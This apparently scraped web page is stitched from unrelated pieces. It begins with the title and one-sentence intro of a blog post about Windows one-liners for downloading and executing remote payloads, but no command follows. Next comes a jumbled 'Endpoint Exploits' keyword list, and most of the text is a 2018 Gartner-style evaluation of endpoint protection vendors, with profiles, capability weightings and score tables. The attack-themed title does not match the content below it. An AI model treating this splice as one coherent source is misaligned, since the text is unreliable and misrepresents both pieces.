Windows oneliners to download remote payload and execute arbitrary code

arno0x0x

In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself “what are the coolest command lines an attacker could use besides the famous powershell oneliner”?



Endpoint Exploits

  • Powershell
  • JAVA
  • DEP
  • UASLR
  • Heap Spray Checks
  • SEH Protection
  • T01 Compatibility
  • Null Dereference Protection
  • Font Protection
  • Heap Spray Mitigation
  • Heap Corruption Mitigation
  • ROP Mitigation
  • DLL Hijacking
  • DLL Security
  • Packaged DLLs
  • Hot Patch Protection
  • ShellLink Protection
  • Enhanced DLL Security
  • Enhanced JIT Protection
  • JIT Mitigation
  • CPL Protection
  • SysExit
  • GS Cookie
  • Child Process Protection
  • Gatekeeper Enhancement
  • Dylib-Hijacking
  • Kernel Privilege Escalation
  • Pass the Hash Attacks
  • SQLi
  • XXE

Critical Capabilities for Endpoint Protection Platforms

Published 30 April 2018 – ID G00334896 – 33 min read


Endpoint protection is evolving to address security architecture tasks such as hardening, investigation, incident detection and incident response. Security and risk management leaders should evaluate EPP vendors’ ability to keep up with modern endpoint threats and their deployment requirements.

Overview

Key Findings

  • Advanced prevention capabilities such as machine learning, software behavior analytics and exploit prevention are no longer only available from newer EPP vendors; rather, they have become part of the core set of prevention solutions offered by nearly all vendors in this market.
  • Many Type B organizations want to incorporate advanced EDR capabilities as a means of actively detecting and responding to threats; however, EDR solutions remain challenging to deploy and operate for most.
  • Most Type B and Type C organizations eventually elect to use EDR as a forensics-focused solution if they operate it themselves, or they opt to engage managed services to supplement their internal capabilities.
  • The appeal of traditional EPP suites has been somewhat tempered in recent years by the emphasis on newer malware detection features such as machine learning and behavioral analysis. Still, many Type B and Type C organizations continue to derive significant value from the integration and common management these suites provide.

Recommendations

Security and risk management leaders responsible for endpoint protection platforms:
  • Type A organizations: Focus on solutions that are flexible and customizable to meet their operational requirements.
  • Type B organizations: Focus on a blend of prevention and detection and response capabilities commensurate with the skills and experience of their security operations teams. Alternatively, evaluate MSS and MDR capabilities to extend their internally available capabilities.
  • Type C organizations: Emphasize prevention-focused solutions. Evaluate EDR mainly as a forensics capability only, and favor solution providers that also offer MSS and MDR capabilities.

Strategic Planning Assumption

By 2021, endpoint protection platforms (EPPs) will provide automated, orchestrated incident investigation and breach response. Separate, stand-alone endpoint detection and response (EDR) solutions will focus on managed security service provider (MSSP) and large enterprise security operations center (SOC) environments.

What You Need to Know

This document was revised on 29 May 2018. The document you are viewing is the corrected version. For more information, see the Corrections page on gartner.com.
This Critical Capabilities research is based on the same data set used for the 2018 Magic Quadrant for Endpoint Protection Platforms. Both documents evaluate products that were publicly available on or before 14 November 2017.
In September 2017, in response to changing market dynamics and client requirements, Gartner adjusted its definition of an EPP. An EPP is a solution deployed on endpoint devices to prevent file-based malware, to detect and block malicious activity from trusted and untrusted applications, and to provide the investigation and remediation capabilities needed to dynamically respond to security incidents and alerts (see “Redefining Endpoint Protection for 2017 and 2018”).
Organizations are placing a premium on the protection and detection capabilities of an EPP, and are placing less value on EPP vendors’ ability to provide data protection capabilities such as data loss prevention, encryption or server controls. Security buyers are increasingly looking to the built-in security capabilities of their OS vendors, and most organizations are adopting disk encryption at the OS level with BitLocker in Microsoft Windows 10 and FileVault in Apple macOS.
Concurrently, protection for servers has diverged from EPP, with specialized tools to address the modern hybrid data center (cloud and on-premises; see “Market Guide for Cloud Workload Protection Platforms”). Gartner recommends that organizations separate the purchasing decisions for server workloads from any product or strategy decisions involving endpoint protection. The evolutionary shift from hardware servers to virtual machines (VMs), containers and private/public cloud infrastructure means that server workloads now have different security requirements compared to end-user-focused, interactive endpoints (see “Endpoint and Server Security: Common Goals, Divergent Solutions”).
This is a transformative period for the EPP market, and as the market has changed, so has the analysis profile used for this research. In the 2017 Magic Quadrant for Endpoint Protection Platforms, capabilities traditionally found in the EDR market (see “Market Guide for Endpoint Detection and Response Solutions”) were considered “nice to have” features. In this 2018 research, some of these features are now core components of an EPP that can address and respond to modern threats.
Note that definitions of Type A, B and C organizations are found in the Use Cases section.

Analysis

Critical Capabilities Use-Case Graphics

Figure 1. Vendors’ Product Scores for Type A Use Case

Source: Gartner (April 2018)

Figure 2. Vendors’ Product Scores for Type B Use Case

Source: Gartner (April 2018)

Figure 3. Vendors’ Product Scores for Type C Use Case

Source: Gartner (April 2018)

Vendors

Bitdefender

Bitdefender provides a solution that is among the highest evaluated effectiveness across a broad range of platforms and capabilities in third-party scores. Its solution is the most repackaged across all EPP vendors. Bitdefender offers EPP and EDR in one platform, and one agent across endpoints, and physical, virtual or cloud servers. While a large part of the installed base is in the consumer segment, the gap between enterprise and consumer business is narrowing.
Bitdefender is a good choice for organizations that value malware detection accuracy and performance, as well as full support for data center and cloud workloads from a single solution provider. Bitdefender is also a partner for Microsoft’s Windows Defender Advanced Threat Protection (ATP) platform, providing agents for Linux and macOS.
The vendor continues to round out its endpoint features for larger enterprises. However, its brand awareness remains low. Bitdefender’s cloud-based, single-agent approach, large installed base, and recently released EDR module keep it relevant in this space.

Carbon Black

Carbon Black is in the middle of a significant corporate transition, consolidating its overall offerings into a new cloud-based security platform called Predictive Security Cloud. The company’s overall offerings consist of Cb Defense (EPP), Cb Response (threat hunting and incident response), and Cb Protection (application whitelisting and device lockdown). Carbon Black began to consolidate EDR features from Cb Response into Cb Defense in 2017 as it started to build a presence in the EPP market. With the upcoming movement to cloud-based management and agent consolidation, Carbon Black implementations should become much simpler for its clients.
Cb Response is typically found in more complex environments with very mature security operations teams. The Cb Defense agent collects and sends all the unfiltered endpoint data to the cloud using a proprietary data streaming mechanism that eliminates bursting and peaks on networks.

Cisco

Cisco’s Advanced Malware Protection (AMP) for Endpoints consists of prevent, detect and respond capabilities deployed as a cloud-managed solution that can be hosted in a public or private cloud.
Cisco’s AMP for Endpoints leverages similar technology to the AMP capabilities in other Cisco products. Its AMP Cloud technology detects known threats, and uses threat intelligence data from Threat Grid and Talos security researchers for exploit prevention.
Gartner clients rarely shortlist AMP for Endpoints for its technology. When they do, it is usually because they get a strong financial incentive when purchasing other Cisco products. AMP for Endpoints did not participate in public endpoint-focused third-party testing in 2017, which impacts its scores in this Critical Capabilities.
Cisco’s AMP solution has the most appeal for existing Cisco clients that leverage other Cisco security solutions and aspire to establish security operations around Cisco products.

Comodo

The Comodo brand is best-known as a digital certificate authority. In October 2017, Francisco Partners acquired a majority stake in Comodo’s certificate authority business, with Comodo planning to focus on its endpoint protection strategy.
Comodo Advanced Endpoint Protection (AEP) includes malware protection, a host-based intrusion prevention system (HIPS), web filtering, a personal firewall, sandbox analysis, vulnerability analysis and patching, and a classification capability that helps guarantee a good or bad verdict on all executable files. When an executable is untrusted or unknown, it is run in a tightly controlled container to isolate any potentially malicious activity.
Comodo also sells secure web gateways, web application firewalls and mobile device management focused on midsize enterprises and small and midsize businesses (SMBs). Its security products are managed from a central web-based portal that manages service request ticketing and workflow.

CrowdStrike

CrowdStrike Falcon’s lightweight single agent supports all environments (physical, virtual and cloud) and functions with the same agent and management console for Falcon Prevent protection and Falcon Insight EDR. With its EDR heritage, CrowdStrike records most endpoint events and sends all recorded data to its cloud for analysis and detection. Some prevention is done locally on the agent.
Alongside EPP and EDR capabilities, CrowdStrike offers a complementary service called Falcon OverWatch that is widely used by its clients.
Falcon OverWatch provides managed threat hunting, alerting, response and investigation assistance.
Organizations with small or no SOC teams will find the combination of Falcon OverWatch and Falcon Endpoint Protection compelling. CrowdStrike also offers a well-respected breach response service.

Cylance

Cylance was one of the pioneers in using machine learning (ML) to detect file-based malware, but by 2017, most EPP competitors claimed to have added ML capabilities, pressuring Cylance to more aggressively address non-file-based attacks. In late May 2017, Cylance formally launched its EDR product, CylanceOPTICS, which was late to market compared to other vendors, and is generally perceived to be lacking in advanced capabilities already available in key competing products.
Eighty-five percent of Cylance’s business is in North America, although the company has about 3,700 customers across the globe, half of which represent organizations with fewer than 500 seats.
CylancePROTECT is cloud-based, with Cylance hosting and managing the console infrastructure directly. The vendor finally started participating in the VirusTotal community in 2017, but has a poor third-party test participation record when compared with established EPP vendors.
Cylance is a good EPP shortlist candidate for organizations requiring a lightweight, low-impact client agent.

Endgame

Endgame is a privately held organization that has evolved from pure EDR for large enterprises and defense organizations, with the addition of prevention capabilities for the broader enterprise market.
Endgame is one of the few vendors in this analysis that sells a single product offering — meaning there are no additional add-ons or purchases — to address protection, detection and response use cases.
The platform is missing a number of traditional EPP-related features, such as application control and suspicious file quarantining. Yet Endgame scores well in protection capabilities by focusing on the tools, techniques and procedures used by adversaries, rather than simply looking for bad files.
Endgame’s big differentiator is in its investigation and threat-hunting capabilities, where natural language understanding (NLU) queries, such as “Search for PowerShell” and “Find NetTraveler,” allow organizations to make use of advanced detection capabilities without the need for deep experience.
Endgame is a good EPP shortlist candidate for organizations with an existing or emerging SOC where incident investigation and response is a key requirement.

ESET

ESET has a strong EPP market share among SMBs to large enterprises. It provides protection with a lightweight agent that includes a large protection stack, consisting of a host-based intrusion prevention system (HIPS), ML, exploit prevention, detection of in-memory attacks and ransomware behavior detection.
ESET recently launched an additional platform for EDR capabilities, called Enterprise Inspector. Customers with experienced security staff will be able to inspect and modify the detection rules within Enterprise Inspector, and further tailor them to their unique requirements.
ESET has significant security community mind share through published research, disruption of organized crime and its WeLiveSecurity website. The vendor’s evaluation is impacted in this assessment by its limited cloud management capabilities, and the relative lateness of its EDR capabilities.
ESET has localized support in 35 languages, which means it is an attractive choice for globally distributed organizations. Its protection capabilities make it a solid shortlist candidate for any organization.

FireEye

FireEye is a security suite vendor that provides email, web, network, endpoint security and threat intelligence, which are managed in the Helix security operations platform.
FireEye revenue from its HX Series endpoint security product is a relatively small portion of the vendor’s overall business. The HX management console is deployed through the cloud or as a virtual or on-premises hardware appliance that supports up to 100,000 endpoints.
FireEye Endpoint Security 4.0 shipped in late September 2017; therefore, market response to FireEye’s endpoint protection capabilities was limited during this research period.

Fortinet

Fortinet is a network security suite vendor whose products include enterprise firewalls, email security, sandbox, web application firewalls and its FortiClient endpoint security software. FortiClient includes components designed to work in conjunction with Fortinet products, including FortiGate (firewall), FortiSandbox, FortiMail, FortiWeb and others.
FortiClient is not well-known to most Gartner clients that inquire about endpoint security, and we see little adoption of it outside of Fortinet’s client base. FortiClient is becoming more focused on the enterprise space, but its current installed base is mostly in the SMB space, and about half of its customers have fewer than 1,000 seats installed.
Gartner clients will find Fortinet most appealing when integrated as part of an existing Fortinet deployment.

F-Secure

In 2017, F-Secure continued with its long track record for high-accuracy, lightweight and low-impact anti-malware detection with its cloud-based F-Secure Protection Service for Business (PSB) offering and on-premises solution, F-Secure Business Suite. F-Secure added an integrated password manager with password protection capabilities and improved device control management to PSB and Business Suite. F-Secure also added ML capabilities to Rapid Detection Service, which is its managed EDR solution.
Over the past 12 months, F-Secure further enhanced its product deployment and management capabilities, making it a good choice for larger, more complex enterprises.
F-Secure is focusing its investments in its managed service offerings, and has added product enhancements with a specific focus on preventing ransomware attacks.

Kaspersky Lab

Kaspersky Lab’s research team makes up one-third of the organization, and is well-known for its accurate malware detection and in-depth investigation and analysis of many sophisticated attacks.
Kaspersky Lab is late to market with EDR capabilities, and has no vendor-managed, SaaS-type cloud-based management options for organizations with more than 1,000 endpoints to manage.
In September 2017, the U.S. government ordered all federal agencies to remove Kaspersky Lab’s software from their systems. Furthermore, several media reports, citing unnamed intelligence sources, have claimed that Kaspersky’s software was being used by the Russian government to access sensitive information. Although the U.S. government has not given any official explanation for the ban, Kaspersky Lab vehemently refutes the unsubstantiated claims and stresses that there has yet to be any evidence produced of its alleged wrongdoing. Kaspersky maintains that the actions lack sufficient basis and are unconstitutional, and has initiated legal action against the U.S. government. Gartner clients, especially those who work closely with U.S. federal agencies, should continue to monitor this situation for updates.
From a technology and malware prevention perspective, Kaspersky Lab remains a good candidate as a solution for any organization that is not constrained by U.S. government recommendations. Despite the media stories surrounding Kaspersky Lab, it continues to grow its endpoint presence globally.

Malwarebytes

In 2017, Malwarebytes delivered cloud-based management, and added mainstream and advanced EDR capabilities to its single agent, which includes the breach remediation tools for remediating infections. It is one of the few vendors in this space that can roll back the changes made by ransomware, including restoring files that were encrypted in the attack. This ransomware remediation can be performed remotely from the cloud management console up to 72 hours after the attack, without the need for any local access to an endpoint.
For organizations with small IT or security teams, Malwarebytes provides strong protection capabilities and some advanced EDR capabilities, all at an attractive price point. For larger organizations or organizations with a mature security team, there are some missing enterprise features that make the Malwarebytes solution a challenge to incorporate into an existing SOC workflow.

McAfee

Intel completed the sale of 51% of McAfee to TPG in April 2017 and, as a stand-alone company, McAfee has refocused its efforts on the core aspect of its business: endpoint protection. McAfee remains one of the top three incumbent EPP vendors by market share, and its execution issues over the past three years make it the top competitive target for displacement by other vendors in the EPP Critical Capabilities.
Specifically, Endpoint Security (ENS) version 10.x (v.10.x) upgrades remained a very challenging adoption cycle for most McAfee clients. The feature set and protection capabilities included in the most recent release are quite compelling, and public test scores have improved over the past year. However, McAfee’s execution assessment is hampered by organizations continuing to be hesitant to adopt the latest version, leaving those organizations vulnerable to commodity malware as well as more advanced threats. Gartner client inquiry data identified McAfee as the single most-quoted EPP vendor that clients were planning to replace. Customer satisfaction scores were low again for 2017.
McAfee’s ePolicy Orchestrator (ePO) continues to be the most quoted reason for clients initially adopting McAfee solutions in their environment, or for retaining McAfee over their contract terms and subsequent renewals. However, disenchantment with the EPP product is quickly eroding the perceived value of ePO in favor of vendors with cloud-based EPP management.
McAfee remains a good shortlist candidate for medium and larger organizations requiring an effective solution and that have a focus on an integrated management and reporting capability.

Microsoft

Microsoft is unique in the EPP space, as it is the only vendor with the capacity to embed protection features directly into the OS. It has used this advantage to step up its efforts in security with Windows 10 features, improvements to Windows Defender (also known as System Center Endpoint Protection), and the addition of Windows Defender Advanced Threat Protection and Windows Defender Security Center.
Windows 10 OS-level features and capabilities available with Windows Enterprise E3 and E5, such as Application Guard, AppLocker, Secure Boot, Device Guard, Exploit Guard, Advanced Threat Protection (ATP) and Credential Guard, significantly improve protection against current common threats. However, these protections are not as well integrated in earlier OS versions.
Overall, Microsoft now provides a broad range of security protections that address a wide spectrum of threats across endpoint, Office 365 and email. The comprehensive solution set will resonate with most organizations’ security requirements, provided their budgets stretch to the higher-tier, E5-level subscription.
Microsoft has become the most-asked-about vendor during EPP-related Gartner client inquiry calls, and there is significant interest in using the security capabilities in Windows 10 to reduce security spend with other vendors. However, while it is improving its detection rates, the solution continues to be challenged to protect against sophisticated threats, and manageability of the solution remains a challenge.

Palo Alto Networks

Palo Alto Networks is still best-known to Gartner clients for its next-generation firewall (NGFW) product line, and this continues to be the main line of introduction to Palo Alto Networks Traps for Gartner clients.
Traps uses a stack of nonsignature detection capabilities, such as ML, static and dynamic analysis, as well as monitoring processes and applications as they are spawned for suspicious activity and events. Suspect files from the endpoint can be tested by Palo Alto Networks WildFire, its cloud-based threat analysis and malware sandboxing platform, which is included with a Traps subscription.
Palo Alto Networks acquired LightCyber in 2017; its behavioral-based analytics technology provides automated detection of suspicious user and entity activity indicative of malware. Traps without LightCyber currently offers limited EDR capabilities, which impacts its scores in this assessment.
Gartner clients will find Palo Alto Networks Traps most appealing when it can integrate with an existing Palo Alto Networks NGFW deployment.

Panda Security

Panda Security’s main value proposition is the classification or attestation of every single executable file and process on a protected endpoint device. It is the only vendor to include a managed threat hunting service in the base purchase of its EPP. Adaptive Defense 360 is fully cloud managed, and combines EPP and EDR into a single offering and single agent.
The attestation service implements an automatic application whitelisting model, where only trusted and approved applications and processes are able to execute.
Panda Security’s cloud-first approach, and the managed services backing the EPP and EDR capabilities, are beginning to increase brand awareness outside of Europe.
Organizations without experienced security staff will find Panda Security a good shortlist candidate for an EPP solution, as will organizations considering managed detection and response solutions that are prepared to replace their incumbent EPP vendor.

SentinelOne

SentinelOne is a part of the new wave of EPP solution providers that have experienced fast growth over the past few years. The cloud-based solution is designed around an embedded EDR feature set and behavioral protection. SentinelOne was one of the first vendors to offer a ransomware protection guarantee based on its behavioral detection and file journaling features.
SentinelOne offers endpoint visibility for investigative information in real time, and an API to integrate common-format, indicator of compromise (IOC)-based threat feeds.
SentinelOne is a good prospect to replace or augment existing EPP solutions for any organization looking for a solution with strong protection and visibility.

Sophos

In March 2017, Sophos acquired Invincea — a Visionary vendor in the 2017 Magic Quadrant for Endpoint Protection Platforms — giving Sophos access to its deep-learning ML algorithms.
The Sophos Intercept X product, designed to protect against and recover from the malicious actions related to ransomware and exploits, is available to Sophos Endpoint Protection customers and as an augmentation to an incumbent EPP.
Also included in the Intercept X purchase are Sophos’ EDR-like capabilities — called Root Cause Analysis — and the ML malware detection technology from the acquisition of Invincea, which was added in late 2017.
Sophos’ cloud-based EPP with the Intercept X platform is a good fit for organizations that can take advantage of a cloud-based administration platform, and that value strong protection against ransomware and exploit-based attacks over advanced forensic investigation capabilities.

Symantec

Symantec continues to provide one of the most comprehensive EPPs available in this market, with third-party test scores remaining in the top tier. Symantec has added advanced features to better address the changing threat landscape, becoming the first vendor to combine malware protection, EDR, system hardening and deception capabilities in a single agent. Application whitelisting continues to be a weak point.
Symantec has begun the process of migrating its offerings to a cloud-first model, with a hybrid option available to clients that prefer to maintain some of the management capabilities on-premises.
Symantec remains a good shortlist candidate for organizations of all sizes.

Trend Micro

Trend Micro is the third-largest vendor in the EPP market, with products ranging across network, data center and endpoint systems. It has a large worldwide footprint, with more than half of its business coming from Japan and the Americas.
Although the vendor has had a rather unremarkable year from a technology innovation perspective, it ticks boxes for mainstream EPP requirements, particularly for those looking for a comprehensive suite of solutions at an affordable price. Trend Micro’s EDR solution is delivered as a separate agent to the EPP solution. While it integrates with additional on-premises products like the Deep Discovery sandbox, it lacks integration with its cloud sandbox, and cannot be managed from Trend Micro’s cloud platform.
One of Trend Micro’s biggest advantages is its vulnerability assessment and virtual patching technology, which identifies unpatched vulnerabilities on the endpoint and uses HIPS rules as a virtual patch to block attempts to exploit them until the real patch is applied.
Trend Micro remains a good shortlist candidate for organizations of all sizes.

Context

When selecting EPP solutions, enterprises should evaluate them in terms of support for specific use cases. Vendors differ in their ability to accommodate different use cases. This research ranks vendors’ solutions against typical use cases.

Product/Service Class Definition

Gartner reviewed the following classes of products and services: prevention, console alerting and reporting, EDR core functionality, EDR advanced response, third-party integration, EPP suite, managed services, geographic support, and OS support.

Critical Capabilities Definition

Prevention

This is the quality, quantity, accuracy and ease of administration of an EPP’s anti-malware technology.
It covers the tools required to block file-based malware attacks, detect and prevent fileless malware attacks, and mitigate the risk of OS and application vulnerabilities. We look at test results from various independent testing organizations and data from VirusTotal, and use Gartner client inquiries as guides to the effectiveness of these techniques and implementations against modern malware.
EPP Suite

This is the support for EPP components traditionally offered as part of an extended EPP suite, in addition to anti-malware and anti-exploit based prevention.
These include offerings for a personal firewall, port and device control, application control, enterprise mobility management, data protection (such as full disk and file encryption) and data loss prevention. Vendors that offer a broad range of capabilities as part of an extended EPP suite are given extra credit here.
Console Alerting and Reporting

This is the provisioning of a centralized, role-centric console or dashboard that enhances the real-time visibility of an organization’s endpoint security state.
It provides clearly prioritized alerts and warnings and intuitive administration workflows. Vendors that have delivered a cloud-first model with feature parity to an on-premises management platform are given extra credit, as organizations struggle to maintain visibility and control over endpoints in use by the increasing remote workforce.
EDR Core Functionality

This is the EDR component’s capabilities for discovering, reporting and prioritizing vulnerabilities present in the environment.
It provides educated guidance for customers to visualize and investigate incidents, remediate malware infections and provide clear root cause analysis, helping reduce the attack surface. EDR core capabilities are typically focused on a forensics use of EDR, meaning investigating an event well after it has occurred. Vendors that focus on lowering the knowledge and skills barrier through guided response tools and easy-to-understand, easy-to-use user interfaces are given extra credit here.
EDR Advanced Response

These are the EDR component’s advanced investigative and remediation capabilities, complex automation, and ability to send and receive detailed investigative workflow information.
It provides capabilities and customizations that push EDR from a functionally forensics-focused use case to an adaptable detection and response platform that can detect and investigate an event as it occurs. Vendors that focus on providing advanced customization capabilities required by an active security operations center are given extra credit here.
Third-Party Integration

This is the support, via APIs, for unidirectional and bidirectional integration with third-party on-premises and cloud-based solutions, such as Active Directory, security information and event management (SIEM), sandboxes, firewalls, threat and indicators of compromise feeds, and SOAR/orchestration.
It provides the ability to have unidirectional and bidirectional communications between the endpoint agent and/or console and third-party resources to enhance the prevention, detection, analysis and response capabilities with the rich data only available on these other platforms. Vendors that not only focus on providing a set of APIs for their own products, but that also have demonstrated integrations with a widely diverse set of third parties to provide additional context and correlation of events, are given extra credit here.
Managed Services

This is support for managed security solutions (MSS) and managed detection and response (MDR) offerings.
MSS offerings typically focus on the deployment and remote operation of traditional endpoint security solutions, including most of the components of a traditional EPP suite. MDR offerings focus on remotely delivering a managed security service that responds to threats that have made it past the prevention capabilities deployed within an environment. MDR solutions that actively detect, investigate, contain and mitigate threats are given extra credit here.
Geographic Support

This is a vendor’s ability to support global customers, as well as the number of languages it supports.
Vendors offering local, regional support offices, 24/7 support in each client region, and other local resources to assist with the deployment and operation of their solutions in a global deployment context (including MSS and MDR) are given extra credit here.
OS Support

This is a vendor’s ability to support the typical operating systems found in client organizations.
Several vendors focus solely on Windows endpoints. Solutions that can also support macOS and Linux with near parity on the features delivered in the Windows clients, most notably in advanced prevention and the activity and event monitoring areas of EDR, are given extra credit here.

Use Cases

Type A

Type A organizations, also referred to as “lean forward” organizations, adopt new technologies very early in the adoption cycle.
Type A organizations represent the smallest group of organizations. They have the budgeting and staffing resources to configure and implement new technologies and solutions rapidly within their environment. These organizations tend to focus on best-of-breed solutions that best address their business, technology and security needs and have the capacity to integrate, develop or build custom-made components as required. They see the use of technology as a competitive differentiator. Their tolerance for risk is high, and their approach to technology change is to run projects in parallel, with multiple teams working on technology and business changes simultaneously. For EPP, these organizations focus on best-of-breed prevention, detection and response.
Type B

Type B organizations aim to stay relatively current on technology without getting too far ahead or behind their competition.
Type B organizations represent the largest group of organizations. They typically experience budgeting and staffing resource constraints and, as a result, focus on overall value by weighing the risks of the early use of new technology against the benefits. Their focus is on technology deployments that improve their organization’s productivity, product quality, customer service and security. Type B organizations typically wait for a technology to become mainstream before considering implementation. They tend to be moderate in their approach, frequently using benchmarks within their industry to justify their investments in technology. Type B organizations balance innovation with reasonable caution when selecting new solutions. For EPP, these organizations focus on a blended approach between prevention, detection and response capabilities that can be complemented with managed services where needed.
Type C

Type C organizations typically view technology as an expense or operational necessity, and use it as a means to reduce costs.
Type C organizations represent the second-largest group. These organizations experience severe budgeting and staffing resource constraints and, as a result, prefer simply to deploy and use integrated solutions with managed services add-ons that can best complement their minimal staff. These organizations wait for technologies to become absolutely stable and for costs to acquire and operate to reach the lowest quartile before committing to purchase. For EPP, these organizations focus on prevention, rather than on integrated detection and response capabilities and solutions that offer a complement of managed services.

Vendors Added and Dropped

Added

None

Dropped

None

Inclusion Criteria

Inclusion in this Critical Capabilities was limited to vendors that met these minimum criteria:
  • The majority of detection events must be from the vendor’s own detection technique, and designed, owned and maintained by the vendor itself. Augmenting with an OEM engine is acceptable, provided it is not the primary method of detection.
  • The vendor’s nonconsumer EPP must have participated in independent, well-known, public tests for accuracy and effectiveness within the 12 months prior to 18 November 2017, or be a current participant in the VirusTotal public interface. Examples include Virus Bulletin, AV-TEST, AV-Comparatives, NSS Labs and SE Labs.
  • The vendor must have more than five named accounts larger than 10,000 seats that use the vendor’s EPP as their sole EPP.
  • The vendor must have a minimum of 500,000 deployed licenses, protecting nonconsumer endpoints, with at least 50,000 of those licenses protecting nonconsumer endpoints within North America.
  • The vendor must satisfy at least 12 of the following “basic” capabilities, and at least four of the following “desirable” capabilities:
    • Basic capabilities:
      • Blocks known and unknown file-based malware, without relying on daily signature distribution
      • Detects suspicious and malicious activity based on the behavior of a process
      • Implements protection for common application vulnerabilities and memory exploit techniques
      • Can perform static, on-demand malware detection scans of folders, drives or devices such as USB drives
      • Suspicious event data can be stored in a centralized location for retrospective IOC and indicator of attack (IOA) searching and analysis
      • Allows real-time IOC/IOA searching across all endpoints (for example, file hash, source/destination IP, registry key)
      • Allows remote quarantining of an endpoint, restricting network access to only the EPP management server
      • Automatically updates policies, controls and new agent/engine versions without connecting directly to the corporate network
      • Continues to collect suspicious event data when outside of the corporate network
      • Detections and alerts include severity and confidence indicators, to aid in prioritization
      • Provides risk-prioritized views based on confidence of the verdict and severity of the incident
      • Displays full process tree to identify how processes were spawned, for an actionable root cause analysis
      • Automatically quarantines malicious files
      • Identifies changes made by malware, and provides the recommended remediation steps
      • Detects, blocks and reports attempt to disable or remove the EPP agent
    • Desirable capabilities:
      • Primary EPP console uses a cloud-based, SaaS-style, multitenant infrastructure, and is operated, managed and maintained by the vendor
      • Implements vulnerability shielding (aka virtual patching) for known vulnerabilities in the OS and for non-OS applications
      • Can implement default-deny whitelisting with a vendor-maintained “app store”-type approach and user self-service features
      • Can implement application isolation to separate untrusted applications from the rest of the system
      • Includes access to a cloud- or network-based sandbox that is VM-evasion-aware
      • Includes deception capabilities designed to expose an attacker
      • Vendor itself offers managed detection services, alerting customers to suspicious activity
      • Vendor itself offers managed threat hunting, or managed IOC/IOA searching, for detecting the existence of threats (not via a third party or channel)
      • Supports advanced natural-language queries with operators and thresholds (for example, “Show all machines with new PE >1 week old AND on <2% of Machines OR Unknown”)
      • Provides guided analysis and remediation based on intelligence gathered by the vendor (for example, “85% of organizations follow these steps”)
      • Provides attribution information and potential motivations behind attacks
      • Can utilize third-party, community and intelligence feeds
      • Allows remote remediation via the management console
      • Includes APIs for integration with security orchestration, automation and response (SOAR)/orchestration for automation 

Table 1: Weighting for Critical Capabilities in Use Cases

Critical Capabilities             Type A   Type B   Type C
Prevention                          10%      15%      20%
Console Alerting and Reporting       5%      15%      20%
EDR Core Functionality              20%      15%      10%
EDR Advanced Response               20%       5%       0%
Third-Party Integration             15%       5%       0%
EPP Suite                            5%      10%      15%
Managed Services                     5%      15%      25%
Geographic Support                  10%      10%       5%
OS Support                          10%      10%       5%
Total                              100%     100%     100%

Source: Gartner (April 2018)
This methodology requires analysts to identify the critical capabilities for a class of products/services. Each capability is then weighted in terms of its relative importance for specific product/service use cases.

Critical Capabilities Rating

Each of the products/services has been evaluated on the critical capabilities on a scale of 1 to 5; a score of 1 = Poor (most or all defined requirements are not achieved), while 5 = Outstanding (significantly exceeds requirements).

Table 2: Product/Service Rating on Critical Capabilities

Rows are vendors; columns are the critical capabilities, rated on the 1-to-5 scale described above.

Vendor               Prev  Cons  EDRc  EDRa  3rdP Suite  MSvc   Geo    OS
Bitdefender           4.5   3.5   2.5   2.0   3.2   4.0   3.0   4.0   4.5
Carbon Black          2.3   3.0   3.0   2.0   3.0   1.0   2.5   4.0   3.0
Cisco                 2.3   3.0   3.0   2.2   3.0   1.0   3.0   4.0   3.2
Comodo                3.5   3.0   2.5   3.0   2.0   3.0   2.7   3.7   3.8
CrowdStrike           3.5   4.0   4.0   4.5   4.0   2.0   4.9   3.0   3.8
Cylance               3.0   3.0   3.0   2.2   3.0   2.0   3.2   3.5   3.5
Endgame               3.7   3.5   4.0   3.5   2.5   2.0   2.0   2.0   2.0
ESET                  4.5   4.0   3.3   2.8   2.5   4.0   2.0   4.0   3.8
FireEye               2.3   3.0   3.5   3.5   3.3   1.0   3.0   4.0   3.5
Fortinet              2.5   2.8   3.0   2.5   2.5   3.5   2.0   3.8   3.5
F-Secure              4.0   3.5   4.0   3.2   2.5   3.8   3.5   3.0   3.5
Kaspersky Lab         4.8   3.8   3.2   3.2   3.0   4.5   3.0   4.0   3.8
Malwarebytes          4.5   4.0   3.5   3.3   2.5   3.8   2.0   4.0   2.5
McAfee                4.0   4.3   3.3   3.2   3.3   4.5   2.0   4.0   3.8
Microsoft             3.0   2.2   3.0   2.5   2.5   3.0   2.0   4.0   1.0
Palo Alto Networks    3.5   3.0   2.8   2.0   3.5   1.7   2.0   4.0   2.8
Panda Security        4.0   3.3   3.8   3.2   3.0   3.0   3.5   3.0   3.8
SentinelOne           3.7   3.5   3.8   3.8   3.5   2.5   2.5   3.0   4.0
Sophos                4.3   4.0   2.5   2.5   2.5   4.5   2.8   4.0   3.8
Symantec              4.5   4.0   3.8   3.8   3.3   4.5   2.8   4.0   4.0
Trend Micro           4.5   3.8   3.3   3.2   3.2   4.5   2.5   4.1   3.8

Key: Prev = Prevention; Cons = Console Alerting and Reporting; EDRc = EDR Core Functionality; EDRa = EDR Advanced Response; 3rdP = Third-Party Integration; Suite = EPP Suite; MSvc = Managed Services; Geo = Geographic Support; OS = OS Support.

Source: Gartner (April 2018)
Table 3 shows the product/service scores for each use case. The scores, which are generated by multiplying the use case weightings by the product/service ratings, summarize how well the critical capabilities are met for each use case.

Table 3: Product Score in Use Cases

Vendor                Type A   Type B   Type C
Bitdefender             3.21     3.54     3.63
Carbon Black            2.71     2.67     2.49
Cisco                   2.79     2.78     2.62
Comodo                  2.94     3.06     3.05
CrowdStrike             3.88     3.77     3.77
Cylance                 2.90     2.99     2.95
Endgame                 3.02     2.88     2.84
ESET                    3.33     3.52     3.52
FireEye                 3.23     2.96     2.69
Fortinet                2.87     2.88     2.75
F-Secure                3.41     3.57     3.67
Kaspersky Lab           3.56     3.76     3.86
Malwarebytes            3.33     3.42     3.45
McAfee                  3.52     3.60     3.56
Microsoft               2.64     2.58     2.54
Palo Alto Networks      2.85     2.82     2.68
Panda Security          3.42     3.48     3.51
SentinelOne             3.54     3.34     3.17
Sophos                  3.15     3.52     3.68
Symantec                3.83     3.87     3.86
Trend Micro             3.56     3.68     3.69

Source: Gartner (April 2018)
To determine an overall score for each product/service in the use cases, multiply the ratings in Table 2 by the weightings shown in Table 1.

Evidence

  • Gartner responded to more than 2,100 client inquiries from 1Q17 to 1Q18.
  • Gartner conducted an online survey of 129 EPP reference customers in 4Q17.
  • Gartner conducted an online survey of 55 EPP channel references in 4Q17.

Critical Capabilities Methodology

